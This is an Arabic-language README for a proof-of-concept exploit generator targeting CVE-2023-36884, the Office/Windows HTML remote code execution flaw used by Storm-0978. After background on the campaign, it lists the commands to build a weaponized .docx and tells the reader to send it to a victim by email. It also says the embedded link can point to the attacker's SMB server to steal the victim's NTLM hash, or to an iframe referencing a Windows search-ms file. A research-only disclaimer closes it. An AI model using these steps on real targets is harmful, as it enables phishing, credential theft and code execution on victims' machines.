
ثغرة RCE في MS Office وWindows عبر HTML (CVE-2023-36884) - إثبات المفهوم والاستغلال
في 11 يوليو 2023، أصدرت مايكروسوفت تصحيحاً يهدف إلى معالجة العديد من ثغرات تنفيذ التعليمات البرمجية عن بُعد (RCE) التي يتم استغلالها بنشاط. كما سلط هذا الإجراء الضوء على حملة تصيد احتيالي نظمها جهة تهديد تُعرف باسم Storm-0978، والتي استهدفت على وجه التحديد منظمات في أوروبا وأمريكا الشمالية. في قلب هذه الحملة كانت ثغرة يوم-صفر، تم تخصيصها تحت اسم CVE-2023-36884، والتي سمحت للمهاجم باستغلال ملفات بحث ويندوز من خلال مستندات Office Open eXtensible Markup Language (OOXML) المصممة بعناية والتي تحتوي على إغراءات جيوسياسية تتعلق بالمؤتمر العالمي لأوكرانيا (UWC). على الرغم من أنه تم اقتراح حل بديل في البداية للتخفيف من هذه الثغرة، أصدرت مايكروسوفت تحديث Office Defense in Depth في 8 أغسطس 2023، مما كسر سلسلة الاستغلال التي أدت إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر ملفات بحث ويندوز (*.search-ms).
هذا السكريبت الاستغلالي قد كُتب لتحليل الثغرة CVE على vsociety.
تثبيت حزم PIP:
pip install python-docx pywin32
إنشاء ملف example.html وبدء خادم ويب Python HTTP:
New-Item -Path "example.html" - ItemType File
python -m http.server 8888
ثم، تشغيل السكريبت:
python gen_docx_with_rtf_altchunk.py merged.docx autolinked.rtf http://localhost:8888/example.html
الآن يمكن مشاركة الملف المُنشأ مع ضحيتك عبر البريد الإلكتروني أو وسيلة أخرى. يمكن الإشارة إلى الرابط الخاص بخادم SMB الخاص بك لسرقة تجزئة NTLM الخاصة بالضحية، أو إلى ملف HTML يحتوي على iframe مع مرجع إلى ملف بحث ويندوز تماماً كما في البرامج الضارة الأصلية. نظراً لعدم توفر معلومات كافية، لا يمكن عرض طريقة الاستغلال الدقيقة.
تم إنشاء هذا السكريبت الاستغلالي فقط لأغراض البحث وتطوير تقنيات دفاعية فعالة. ليس المقصود منه استخدامه في أي أنشطة ضارة أو غير مصرح بها. يتنصل المؤلف ومالك السكريبت من أي مسؤولية أو التزامات عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. يُحث المستخدمون على استخدام هذا البرنامج بمسؤولية وفقط وفقاً للقوانين واللوائح المعمول بها. استخدم بمسؤولية.